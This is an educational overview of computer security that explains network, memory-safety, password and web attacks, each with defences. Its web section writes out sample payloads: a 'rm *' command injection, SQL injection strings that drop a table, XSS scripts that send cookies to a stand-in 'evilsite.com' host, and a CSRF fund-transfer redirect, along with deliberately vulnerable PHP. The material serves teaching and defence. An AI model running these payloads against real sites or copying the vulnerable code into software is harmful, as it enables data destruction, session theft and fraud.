The goal of computer security is to protect assets on computer systems against attack. We need to understand how attacks are performed in order to combat with attackers. Some common attacks are presented in this article, such as DNS poisoning, DOS, stack overflow and XSS.
Concepts
What is security? Security properties: CIA+AAA
- Confidentiality: avoidance of the unauthorized disclosure of information
- Encryption
- Access control
- Authentication: determination of identity or role that somebody has
- Authorization: determination that if a person is allowed to access resources based on access control policy
- Integrity: data has not been maliciously altered
- backup
- checksum
- data correcting code
- Availability: data/service can be accessed as desired
- computational redundancies (backup): computer or storage device that serves as fallback in the case of failures, e.g., RAID
- Authenticity: determine that if the statement issued by a person is genuine. Nonrepudiation: authentic statement issued by a person cannot be denied.
- digital signature
- Anonymity: data source is not identifiable
- aggregation
- mixing
- proxy
- pseudonym
- Accountability: actions are traceable to those responsible
Attack types:
- Eavesdropping (confidentiality): interception of information intended to somebody else
- sniffing
- Alteration (integrity): unauthorized modification of information
- man-in-the-middle
- Denial-of-service (availability): interruption of a service
- Masquerading (authenticity): pretend to be somebody else
- phishing
- spoofing
- Repudiation (assurance): denial of a digital receipt
- Traceback (anonymity): reveal the source of information
Network Security
I will cover the basic knowledge of networking and then present some well-known attacks.
TCP/IP model
The network communication is characterized by 3 fundamental principles:
- packet switching
- data split into packets
- packets transported independently and handled with best effort
- may be dropped
- stack of layers
- higher layers uses services of lower layers
- TCP/IP protocol suite (low->high): physical, data link, network, transport, application
- encapsulation
- control information: header or footer (optional) + data: payload,
- a packet from a higher layer becomes the payload of a packet in the next lower layer
Link layer
Ethernet
Ethernet refers to both the physical media used and the link layer protocol standardized as IEEE802.3.
Each network device, specifically interface, is identified by a MAC (Media Access Control) address: 48-bit with the first 3 octets are organization identifier.
Both hub and switch connect multiple devices together and operate at the link layer.
Hub: each frame received is duplicated and broadcast to all the machines connected on the same network segment. Random wait strategy is adopted to avoid collision. Problems: a large amount of unnecessary traffic and eavesdropping.
Switch: learns the MAC address of the machines that are connected to its various ports/interfaces and forwards frames only to the destination devices (broadcast if the MAC addresses are unknown).
ARP
Address Resolution Protocol (ARP): a link layer Protocol that determines the MAC address associated with a given IP address.
How does ARP work?
The source machine needs to know the MAC address of the destination machine.
- It broadcast the ARP request to all network interfaces on the LAN: "Who has IP address 192.168.1.105? Tell IP address 192.168.1.102."
- The machine with the IP address 192.168.1.105 responds with an ARP reply to the source machine: "192.168.1.105 is at 00:16:B7:29:E4:7D"
- When the source machine receives the ARP reply, it stores the IP-MAC address pair in a table called ARP cache for some time.
- After this resolution, the source can finally send its data to the destination.
What's wrong with ARP?
- The ARP cache is updated whenever an ARP response is received
- ARP announcements are not authenticated
What is ARP spoofing/ARP cache poisoning?
The attacker pretends to be the gateway and establishes a man-in-the-middle between the target and the gateway. This kind of attack leads to eavesdropping, such as sniffing passwords, or even tampering the traffic.
How to defend?
- static ARP table: inconvenient
- softwares that inspect ARP packets and detect spoofing
Network layer
IP
Internet Protocol is a network layer protocol that performs a best effort to route data packet from a source node to a destination node in the Internet. A node is identified by an IP address (32-bit in IPv4, 128-bit in IPv6).
| Class | Leading bits | Default subnet mask in dot-decimal notation |
|-----------------------|--------------|---------------------------------------------|
| Class A | 0 | 255.0.0.0 |
| Class B | 10 | 255.255.0.0 |
| Class C | 110 | 255.255.255.0 |
| Class D (multicast) | 1110 | not defined |
How does IP packet routing work?
Any host employs a simple algorithm for routing outbound packets:
- if the destination IP address is in the same LAN, the packet is transmitted directly to the destination machine
- otherwise, transmitted to gateway which will handle the next step of the routing
gateway/router: given the destination IP address, delivers to the destination machine in one of its LANs or forwards to a neighboring router using a routing table. A TTL field in the IP packet can deal with routing loop. The Internet is partitioned into clusters called autonomous systems (AS). Routing within an AS is done using shortest paths (OSPF) whereas routing between multiple ASs is determined by contractual agreements (BGP).
Attacks for IP:
- IP spoofing: the attacker specifies a desired source address other than the sender's real IP address in the IP packet. Defenses:
- block/filter spoofed packets in border routers
- block the attacker machine using IP traceback techniques
- IP sniffing: setting a network interface to promiscuous mode allows an attacker to capture/eavesdrop all data transmitted over a particular network segment (such as a network connected by a hub in the center). Defenses:
- use switches as opposed to hubs
- encryption mechanism should be utilized in higher-level protocols
ICMP
Internet Control Message Protocol is used for network diagnosis, such as testing if a host is alive (e.g., ping) or finding the path to a target host (traceroute).
4 types of messages:
- echo request
- echo response
- time exceeded
- destination unreachable
Transport layer
- TCP
- connection oriented
- reliable stream of ordered bytes using sequence number and acknowledgement number
- flow control by sliding window
- congestion control by automatically adjusting congestion window size as network condition changes
- UDP
- connectionless or stateless
- unreliable, best-effort: no guarantee about the correctness or order; checking for missing packets is left to applications processing these packets
- much faster: suitable for time sensitive applications where communication speed is more important than completeness
Both TCP and UDP support concurrent applications on the same host by using ports (16-bit) of which 0~1023 are reserved for known protocols.
- TCP session hijacking: hijack or alter an existing TCP session. step 1. inspect the sequence numbers by packet sniffing; step 2. inject a packet using a spoofed source IP address. Countermeasures: encryption
- Denial-Of-Service (DOS): exceed the maximum capability (e.g., bandwidth) of a server in order to cause a server not to function properly
- Ping flood: a powerful machine sends a massive amount of ICMP echo request to a single victim server which will be overwhelmed with the traffic and starts to drop legitimate connections
- Smurf attack is a clever way of Ping flood attack. The attacker sends an ICMP packet with a source address set to the target and with a destination address set to the broadcast address of a network (amplifier) where every node replies to the target. Countermeasure:
- routers should be configured to ignore broadcast requests
- a server can be configured to ignore ping requests
- SYN flood: an attacker sends a large number of SYN packets (usually with spoofed source address) to the victim server, ignores the SYN/ACK replies, and never sends the expected ACK packets. The victim machine's backlog queue will exceed and block out other, legitimate TCP requests. Countermeasures:
- SYN cookies
- not allocate resources to half-opened connections
- Optimistic TCP ACK attack: the attacker acknowledges (sends ACKs to) in-flight packets in order to increase the server's traffic rate. Countermeasure: set maximum traffic limit per client
- Distributed DOS (DDOS): control a large number of machines (botnets) to direct traffic to a single server. Countermeasures:
- IP traceback: determining the origin of a packet without relying on the source address field (because it's spoofed). E.g., reconstruct the path to the attacker by node sampling (the packet is marked by some router in the path).
Application layer
This section will focus on the most commonly used application protocols: DNS and HTTPS.
DNS
URL describes the location and access method of resources on the Internet.
URL:
<scheme>://<user>:<password>@<host>:<port>/<url-path>?<query-string>
host is also called domain name:
<subdomain>.<domain>.<topdomain>
DNS Maps (many to many) domain names to their corresponding IP addresses based on distributed databases on name servers organized in a hierarchical way.
Each name server stores a collection of records. Main record types include:
- A record: host name -> IP address
- NS record: domain -> authoritative server
- Glue record (break circular references): a record of type A for a name server referred in a NS record. Example:
inf.ed.ac.uk. NS dns0.inf.ed.ac.uk. dns0.inf.ed.ac.uk. A 129.215.160.240 [glue record]
Name resolution:
- Iterative resolution: name server refers client to authoritative server via NS record
- Recursive resolution: name server queries other name servers and forwards the final answer to client
Query mechanism:
- issued over port 53
- 16-bit request identifier match answer with query
- no sufficient authentication
Pharming and phishing
Pharming: An attacker causes requests for websites to resolve to false IP addresses of his malicious servers.
Phishing: resolve a domain to a web site that appears identical to the requested site, but is designed for a malicious intent, like grab passwords.
DNS cache poisoning
Clients/Resolvers (OS or application) and lower lever name servers cache records that are results of queries.
Why caching?
- reduce DNS traffic. The root servers and TLD servers will be overloaded without DNS caching.
- more efficient with caching
DNS cache poisoning tricks a name server into caching a fake DNS record. Any clients of the name server issuing DNS requests for the poisoned domain will be redirected to the attacker's IP address.
A DNS server is vulnerable to DNS cache poisoning probably because it:
- disregard identifiers or has predictable identifiers
- nonresponse for a nonexistent subdomain
Subdomain DNS Cache poisoning:
- Attacker cause victim (either DNS server or client) to send many DNS requests for nonexistent subdomains of the target domain
- Attacker sends victim forged DNS response
- correct NS record
- Spoofed glue record pointing to the attacker's IP
Defense:
- use random identifier combined with random return port
- use signed records (DNSSEC: signing all DNS replies with public key cryptography)
HTTPS
HTTPS = HTTP + TLS
TLS is an intermediate layer between transport and application layer and handles encryption, integrity and authentication.
\ | Confidentiality | Integrity | Authentication |
---|---|---|---|
Setup | public-key based key-exchange (RSA or DH) | public-key digital signature (RSA) | |
Data transmission | Symmetric encryption (AES in CBC mode) | Hash-based MAC (SHA256) |
Authenticity of the server is implemented by certificates which form a chain of trust. A certificate includes at least the following information:
- issuer: CA that issues the certificate
- subject: organization owning the website
- domain name
- expiration date
- cryptographic ciphers
- public key
- signature
There is no efficient way to break HTTPS although some attacks exist such as LOGJAM aimed at signed DH and padding attack aimed at RSA.
Firewalls and IDS
Firewall, usually deployed in a router, is designed to prevent unauthorized access to a private network based on a predefined set of rules.
Each rule can specify
- protocol
- source or destination IP:port
- other properties of the packet, such as SYN flag in a TCP packet
- action
- accept
- reject (inform the source that the packet was rejected)
- drop (no indication of failure)
The set of rules can be blacklist or whitelist.
Firewall types include
- stateless or packet filter: treat each packet isolated without considering other packets
- stateful: maintain records of active connections passing through it and can determine if a packet is either the start of a new connection or part of an existing connection. It can allow only inbound packets which are response to a connection initiated from within a trusted internal network
- application layer firewall: act as a protective MitM that can "understand" certain application protocols and inspect contents of packets (i.e., data stored in the application layer) and then allows an admin to block inappropriate traffic
IDS (Intrusion Detection System) can detect a potential incident/attack in progress whereas firewalls are preventative. If an IDS detects an intrusion such as port scanning or DOS, it sounds an alarm so that the admin can react to a possible attack.
Most IDS incorporate the two methods below:
- Rule based intrusion detection
- use rules to identify actions that match certain know intrusion attack
- require admin to anticipate the attack pattern in advance
- impossible to detect a new type of attack
- low false positive
- Statistical intrusion detection
- dynamically build a statistical model of acceptable or normal traffic and alarm anything that does not match (abnormal traffic pattern indicates malicious behavior)
- admin does not need to anticipate potential attack
- can detect new types of attacks
- high false positive
Application program Security
Buffer overflow
Stack Overflow
void function(int a, int b, int c){
char buffer1[5];
}
void main() {
function(1,2,3);
}
The stack consists of frames. Each is associated with an active function call.
- calling function
- push arguments onto the stack (in reverse order)
- push return address (the address of instruction to run after the current call terminates) onto the stack
- jump to the function's address
- called function
- push the old stack frame pointer (%ebp) onto the stack
- set the stack frame pointer (%ebp) to where the end of the stack is right now (%esp)
- push local variables onto the stack
- returning
- reset the previous stack frame %esp = %ebp, %ebp = (%esp)
- jump back to return address %eip = 4(%esp)
Stack Overflow attempts to change the flow of execution by overwriting the return address to point to malicious code loaded onto the stack or known lib functions. As illustrated below, it occurs when the program blindly copies the user input to a buffer which is smaller than the input and, as a result, overwrites local variables adjacent to the buffer in the memory.
Challenges for this attack
- the injected code must be machine instructions and cannot contain any 0x00
- find the relative address of return pointer in the stack with respect to the current buffer
- find the address of the injected code. NOP sledding: land on NOPs inserted before malicious code
Defenses
- avoid using unsafe functions which do not check the bounds of buffers they manipulate. use their safe counterparts instead. e.g., replace
strcpy
withstrlcpy
- stack canary
- place a small integer (random) right before the return pointer, the value is also stored somewhere else
- to overwrite the return pointer the canary must also be overwritten
- the canary is checked to make sure it has not changed before the function returns
- make stack and heap non-executable: even if the canary is bypassed, the malicious code loaded can not be executed. Still vulnerable to return-to-lib attack.
- address space layout randomization: place standard libraries to random locations in memory. Therefore, for each program,
exec()
is situated at a different location - safe programming: whenever a program copies the user-supplied input into a buffer, ensure not to copy more data than the buffer can hold
Arithmetic overflow
Integer overflow:
Attempt to store a value in an integer when the value is greater than the maximum value the integer can hold
The representation of integers in a 32-bit architecture:
- unsigned integers: 0x00000000 - 0xffffffff
- signed integers (the most significant bit is 0 for positive number and 1 for negative number) use two's compliment notation
- positive numbers: N=N, e.g., 1=0x00000001
- negative numbers: -N=2^n-N, e.g., -1=0xffffffff
An example of arithmetic overflow is shown below where the output is 0x0:
#include <stdio.h>
int main(void){
unsigned int num = 0xffffffff;
printf("num + 1 = 0x%x\n", num+1);
return 0;
}
Safe programming practice takes the integer upper bounds into consideration.
Format string
If an attacker is able to provide the format string which controls the behavior of a format function, he can view the stack memory:
printf("%08x.%08x.%08x.%08x.%08x|%s|");
printf("hello %n", &temp) // writes '6' into temp. %n writes the number of characters printed so far
To prevent this attack, programmers should always provide format strings:
printf("%s", argv[1]);
Password based Authentication
Attacks for cracking passwords:
- brute force: k^l
- dictionary attack, try
- common passwords
- English words
- combination of notable dates and names
- etc
- rainbow table: precomputed table for reversing hash functions
How should passwords be stored? hash of password with random salt: hash(pwd||salt)
Advantage: protect against frequency analysis and precomputed table attack because every password has a different random salt and even identical passwords will have different hash values.
Web Security
This section will cover 2 types of attack in the web world: injection on server side and session hijacking in the client side.
Injection
Injection attack occurs when untrusted input data is used as part of a command or query resulting in executing unintended commands or accessing/manipulating data without authorization.
Command injection
Example
Consider a service that prints the result from the command whois
. An example URL is http://www.example.com/content.php?domain=google.com
and the implementation of content.php might be:
<?php
if ($GET['domain']) {
echo system('whois '.$GET['domain']);
}
?>
www.example.com; rm *
will result in the following PHP
echo system('whois www.google.com; rm *');
Defense
- escape input: the input string is treated as a single argument
- follow least privilege principle: the web server should be operating with the most restrictive permissions as possible (only has read, write and execute permissions to necessary files)
SQL injection
Example
A web server logins user if the user exists with given username and password.
<?php
$conn = pg_pconnect("dbname=user_accounts");
$result = pg_query(conn, "SELECT * from user accounts
WHERE username = " '.$ GET['user'].'" AND password = '".$ GET['pwd']."';");
if(pg_query_num($result) > 0) {
echo "Success";
user_control_panel_redirect();
}
An attacker can Login (bypassing authorization) as admin via URL http://www.example.com/login.php?user=admin'#&pwd=f
<?php
pg_query(conn,
"SELECT * from user_accounts
WHERE username = 'admin' # ' AND password = 'f';");
http://www.example.com/login.php?user=admin';DROP TABLE user_accounts;#&pwd=f
<?php
pg_query(conn,
"SELECT * from user_accounts WHERE user = 'admin'; DROP TABLE user accounts; # ' AND password = 'f';");
Defense
- sanitize user input, i.e., escape special characters
- prepared statements: untrusted input is not interpreted as a command
Session hijacking
Two main approaches to maintain Session (to remember a user or shopping cart):
- hidden field: include a hidden field containing a unique session ID in a form of all the html pages sent to the client and this field will be sent back to the server in subsequent requests
<input type="hidden" name="sessionid" value="12345">
- cookie: a cookie is a key value pair with other attributes sent by the server to a browser which automatically includes the cookie in all subsequent requests to the origin domain
Sessions can be hijacked in 2 different ways:
- XSS (Session token theft)
- CSRF
XSS
Cross Site Scripting: improper validation of input allows malicious code to be injected into the vulnerable site and to be executed on a victim's browser.
There are two categories of XSS attack:
1. Stored XSS attack: the malicious script is stored in the vulnerable site, like DB
Consider a guestbook where users can leave comments
<html>
<title>Sign My Guestbook!</title>
<body>
Sign my guestbook!
<form action="sign.php" method="POST">
<input type="text" name="name">
<input type="text" name="message" size="40"> <input type="submit" value="Submit">
</form> </body>
</html>
<script>alert("XSS injection!");</script>
<html>
<title>My Guestbook</title>
<body>
Your comments are greatly appreciated!<br />
Here is what everyone said:<br />
Evilguy: <script>alert("XSS Injection!");</script> <br />
Joe: Hi! <br />
John: Hello, how are you? <br />
Jane: How does the guestbook work? <br />
</body> </html>
The malicious code above is harmless. However, it can steal a user's session ID:
<script>
img = new Image();
img.src = "http://www.evilsite.com/steal.php?cookie="+document.cookie;
</script>
2. Reflected XSS attack: malicious script is sent by the victim and then reflected off the vulnerable site
Consider a search page that echos the search query, the results page of http://victimsite.com/search.php?query=security
might contain a line: Search results for security
An attacker can construct a malicious query like this:
http://victimsite.com/search.php?query= <script>document.location='http://evilsite.com/steal.php?cookie='+document.cookie</script>
On clicking this link, the victim's cookies on the vulnerable site will be sent to the attacker's site.
Defense
The root cause is on the server side: failure to sanitize input provided by a user.
- Escape special characters such as
<, >, ", &
before rendering it into HTML - Input validation: check inputs are of expected form
- Http-Only flag in cookie: if enabled js cannot access or manipulate the cookie
CSRF
Cross-Site Request Forgery: a malicious website causes a victim to unknowingly execute commands on a vulnerable website which the victim is currently authenticated to.
Example
Suppose an innocent user handles banking online at www.banking.com
. This user may stumble into a site www.evilsite.com
that contains malicious JavaScript code below:
<script>
document.location="http://www.banking.com/transferFunds.php?amount=10000&fromID=1234&toID=5678";
</script>
Defense
- Check the Referrer header which indicates the website from which the request was issued. problems: some browsers do not specify referrer header for privacy reason; can be spoofed by attacker?
- Cookie combined with Session token to authenticate a user: an unpredictable session/CSRF token is usually included in a hidden field in the html page of every HTTP response and is passed back via URL or POST data in every HTTP request. The server needs to check the validity of both the cookie and CSRF token. It's recommended to use a different session token in each server response to avoid replay attack.
- Logout frequently